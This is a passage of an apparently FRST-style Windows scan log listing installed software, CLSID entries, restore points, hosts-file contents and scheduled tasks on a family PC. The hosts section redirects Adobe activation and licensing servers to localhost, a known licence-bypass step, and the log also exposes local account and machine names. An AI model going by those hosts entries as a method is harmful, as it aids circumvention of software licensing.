Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2837600) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{17815BC8-062D-49BE-B40C-B54149C85CE3}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{84B191B5-5319-463A-A305-8C4D53B1D20A}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{1AA82E2E-7DB7-4C70-910C-BBB657A6B3A5}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{428CB7A0-1068-4CE1-8835-39C7ECD297ED}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{428CB7A0-1068-4CE1-8835-39C7ECD297ED}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PRJPROR_{B114A387-8A14-4C43-AE51-82F17EB81D49}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{B114A387-8A14-4C43-AE51-82F17EB81D49}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{6E760BBA-B83F-4C2D-918F-5F91EF6C9861}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0044-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{D1F3B526-7EB2-4701-92DB-0784988D78DE}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{D1F3B526-7EB2-4701-92DB-0784988D78DE}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{52BEF8AE-9324-40A1-9A92-E5A8FB63A475}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PRJPROR_{8F699D53-05FB-488E-B7D3-E4E47257BE5D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{8F699D53-05FB-488E-B7D3-E4E47257BE5D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PRJPROR_{4B9B2BAF-EE1F-4B60-A4D9-17B7BEEB13A1}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUSR_{4B9B2BAF-EE1F-4B60-A4D9-17B7BEEB13A1}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{6164E0E5-C903-488C-93AF-1B7AF7EBC331}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{90140000-0018-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{FD360122-6829-4497-97C1-1BF578EF695B}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{A20A650C-F820-4CE4-AEA5-EC140192FAFB}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{F6F342A1-530B-4D48-A468-1E3F70928984}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{C950A55F-82E3-4CC8-8FA2-E8A2A0F651F3}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{89FDC8D9-FB84-4EFE-950D-AF4EECC3B64C}) (Version:  - Microsoft)
ViewNX 2 (HKLM-x32\...\{DDD62492-32A7-412B-8AF1-2CF032AD42E3}) (Version: 2.1.0 - Nikon)
Vinagame ZP Tu Lo Kho (Ta La) (HKLM-x32\...\Vinagame ZP Tu Lo Kho (Ta La)) (Version:  - )
Virtual Villagers 2 (HKLM-x32\...\Virtual Villagers 2_is1) (Version:  - FreeGamePick.com)
VLC media player 1.1.11 (HKLM-x32\...\VLC media player) (Version: 1.1.11 - VideoLAN)
VNPT-CA CL Token Manager V1 (HKLM-x32\...\ePass2002Auto-4FE7-A218-48BDAE051E2B_std100131216) (Version:  - EnterSafe)
Vodafone Mobile Connect Lite (HKLM-x32\...\{E3B99F3D-9856-482A-9048-305E28E2510C}) (Version: 9.4.2.14731 - Vodafone)
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3002 - Acer Incorporated)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.4300 - Broadcom Corporation)
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Family Safety (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Family Safety (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM-x32\...\{76618402-179D-4699-A66B-D351C59436BC}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
WinRAR Password Cracker (HKLM-x32\...\{C6A96049-4BD0-465D-BF4D-66CBD0D0E3DD}) (Version: 3.1.0.0 - iWesoft)
XCOM: Enemy Within (HKLM-x32\...\WENPTUVuZW15V2l0aGlu_is1) (Version: 1 - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version:  - )
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
YTD Video Downloader 4.3 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 4.3 - GreenTree Applications SRL)
Zing Play (HKLM-x32\...\Zing Play) (Version: 3.0.106.8 - )
ZPTaLaAnDau (HKLM-x32\...\ZPTaLaAnDau) (Version:  - )
ZTE USB Driver (HKLM\...\ZTE USB Driver) (Version: 1.0.1.25_TME - ZTE Corporation)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1000_Classes\CLSID\{71748560-AA80-4469-9C1D-29A66233974C}\InprocServer32 -> C:\Users\Papa\AppData\Roaming\webnavi\nvi64.dll No File
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1000_Classes\CLSID\{D66AFFF1-8FE8-48f0-A2D7-D231D926E751}\InprocServer32 -> C:\Users\Papa\AppData\Roaming\webnavi\nvi64.dll No File
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\FileSyncApi64.dll (Microsoft Corporation)
 
==================== Restore Points  =========================
 
26-07-2014 23:01:21 Windows Update
03-08-2014 10:33:53 Geplanter Prüfpunkt
03-08-2014 18:53:40 Windows Update
09-08-2014 18:13:52 Windows Update
12-08-2014 09:25:29 avast! antivirus system restore point
12-08-2014 09:30:19 Gerätetreiber-Paketinstallation: Avast Netzwerkdienst
15-08-2014 14:40:38 Windows Update
19-08-2014 12:40:49 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-04-02 22:36 - 2014-04-02 22:36 - 00000954 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 lmlicenses.wip4.adobe.com
127.0.0.1 lm.licenses.adobe.com
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {002DFDBA-CA08-4B5C-9928-43147F96E817} - System32\Tasks\{1ED8EA91-DFCB-4126-8745-06E5E90A0E0E} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {0039F30C-749F-4539-AC6D-51FA8B6110E0} - System32\Tasks\{F6498D6E-56F6-4EDA-AE0B-A05EAC086407} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {0174B73F-DDEB-4AB5-871D-CA81AD7A301B} - System32\Tasks\{FEFD3BAB-D8EF-4232-B26C-88512C02F161} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3\BF2_EditorSetup_v1.3.exe
Task: {07332F5E-ED4D-4B2A-AE14-4571172E64DE} - System32\Tasks\{D450941B-0D13-4C9F-9211-9CB2D30CD9BE} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {168E0202-9636-4D94-B234-DA1EE290C4CD} - System32\Tasks\{345E766D-20F2-4095-B19A-5275B3BA7F5B} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {1D4497B2-95C3-449F-8666-AEBAB81A1CC4} - System32\Tasks\{645C8593-CEF7-4F83-B6E9-27E3B823E73F} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3\BF2_EditorSetup_v1.3.exe
Task: {2D262205-9E36-404B-84B6-5483186B48A5} - System32\Tasks\{F522BCE3-8FE5-415C-AA87-260EB3449DBF} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {2E2466B6-6AA4-4164-B260-D78E3CA91F17} - System32\Tasks\{6F845129-D911-4AFE-A1E1-7EEF2BDC178F} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3.exe
Task: {3CF562CC-50FE-468A-82A6-BF1D27038B0C} - System32\Tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon) => C:\Program Files\ReviverSoft\Registry Reviver\RegistryReviver.exe
Task: {3D2DAE11-127B-48E7-8701-51682BAA8DF3} - System32\Tasks\{97073CF9-72E4-4582-94D5-0C25978710EE} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {5865B49E-AC2A-4699-BA0A-A6701E4EB11A} - System32\Tasks\{2D71BAD1-6910-4B10-80BF-E8C4B821371E} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {589D657D-AE7F-4300-A185-FFE8E5CA232B} - System32\Tasks\{4E20B463-DADE-4CEC-A9D2-9E304BCF1B06} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2_r.exe [2006-05-04] ()
Task: {5EC27903-7396-4F51-9186-C7AE53D663F9} - System32\Tasks\{60806E6A-01A7-4414-85B9-CAC41EEECD9E} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {6A8B2BD3-6DBA-4EE7-A192-6C109A89902A} - System32\Tasks\{0D49F02F-BCC2-41BD-8E01-8D9293E07387} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3\BF2_EditorSetup_v1.3.exe
Task: {6AE0B28B-FFDA-4DEC-9921-376E3D5F7A3E} - System32\Tasks\{5163E2A9-C491-49AE-9F29-3C871BE9779B} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {70F134F5-EDBB-48C8-AD63-7D67287B8F61} - System32\Tasks\{F60421AB-250F-47BE-8660-DFB81D951413} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {74F9557D-5D27-4135-9255-5623024EAA25} - System32\Tasks\{A0B70D75-45C5-458A-BDED-9D4F0AB53022} => C:\Program Files (x86)\AsiasoftVN\TheGioiBaVuong\BaVuong2\ga2.exe
Task: {790234E9-2571-4CCF-8470-C21783CEFE4B} - System32\Tasks\{F5D1686F-FB4D-42C1-83B8-404F640CADF1} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {7B4F85AE-EA59-4BEC-B189-4543AA6A826E} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {869B6B82-046E-4C6A-8BAC-0915A0099D7E} - System32\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe [2014-01-20] (Itim Technologies Co., Ltd.)
Task: {91756579-2FCB-4690-8BEE-848D9C5F29E7} - System32\Tasks\HPCustParticipation HP Photosmart 6510 series => C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPCustPartic.exe [2011-05-25] (Hewlett-Packard Co.)
Task: {9502FF07-AC6C-4D2F-8549-D05D11949ABC} - System32\Tasks\Telerik Control Panel Notifier FAMILIE-LE-NB_Papa => TelerikControlPanelNotifier.exe
Task: {99258B7B-2C6A-490F-824C-2C56D3D658A9} - System32\Tasks\{B78CBE6B-43C7-467D-8ECC-0BA2A7FAAC3F} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {A592CD30-577C-4215-B3C3-1C6EAE49C167} - System32\Tasks\{89ECCF29-090E-4CA0-905C-860432B622B1} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {B730D49D-C36E-4831-94CD-D9F6D1935BBB} - System32\Tasks\{3AACD023-7722-4ED7-AB7F-9BD4F2FA51FD} => C:\Program Files (x86)\The Sir. Community\BattleDirector\BattleDirector.exe
Task: {BBD9947F-9762-4E33-BA5D-B36C38D75E14} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-11-16] (Google Inc.)
Task: {BBF560C9-2C10-4B5A-A17E-5770A2C8B313} - System32\Tasks\{593BBC14-B748-4EDA-BD4A-95368FC41E6F} => C:\Program Files (x86)\The Sir. Community\BattleDirector\BattleDirector.exe
Task: {C4175321-C341-44EF-B15C-A3CC9FD577BE} - System32\Tasks\{C6EFE039-88BD-44F2-8C90-6F57CAC3B61C} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {C435DDAC-5331-45BA-9C21-18BB4B850159} - System32\Tasks\{2CDC2B10-FF27-4E91-B3C5-7D8005FD63DF} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {CA93F0B4-8B1F-45AA-BDE5-F49E9DDE8E91} - System32\Tasks\{D7218A5D-2E81-4946-9E96-9F8B93254E4D} => C:\Program Files (x86)\PlayPark\QuyenVuong\ga2.exe [2010-01-14] ()
Task: {DAB6F2CF-9151-4FCC-B498-E37A2C97F2AF} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2014-08-12] (AVAST Software)
Task: {DC06A566-78A8-41ED-BBD7-CFBA5F467A6F} - System32\Tasks\{3E8EFA57-7A4F-48BE-885B-3E49358CBC14} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {DC0F13C8-13F1-49C9-8D43-CB1E83D76ADF} - System32\Tasks\{387A92AC-BF34-4248-8AB4-3C310797847D} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {E8052F49-2133-45FF-AE28-0B8BA15F7902} - System32\Tasks\HP Photo Creations Messager => C:\ProgramData\HP Photo Creations\MessageCheck.exe [2011-02-15] ()
Task: {EB8C6B0F-3D19-4440-8822-4D23664326B1} - System32\Tasks\{D72C7B5E-6957-4E3A-8BF8-9ED773DF1A14} => Chrome.exe http://ui.skype.com/...e=tsProgressBar
Task: {EF2D26AC-0965-44A0-9CE7-4842D2F2E586} - System32\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe [2014-01-20] (Itim Technologies Co., Ltd.)
Task: {EFDF17FB-1C37-492E-9AA6-EB10EF0499E8} - System32\Tasks\{43CEBE49-F60A-4FCC-AD63-0294344797D7} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3.exe
Task: {F12BE396-F510-4003-BA05-8F0E8F0D34B1} - System32\Tasks\{78175C85-8141-4DD1-A2D5-DEF3FAAB6215} => C:\Program Files (x86)\AsiasoftVN\TheGioiBaVuong\BaVuong2\ga2.exe
Task: {F7289060-1A3E-422B-85DD-66A506B7A966} - System32\Tasks\{0E90ABFC-6C49-4640-9D84-3DD59B942607} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {F7DB6933-9CC7-4315-BCCF-7AB8E2F5F7F0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-11-16] (Google Inc.)
Task: C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core.job => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe
Task: C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA.job => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe
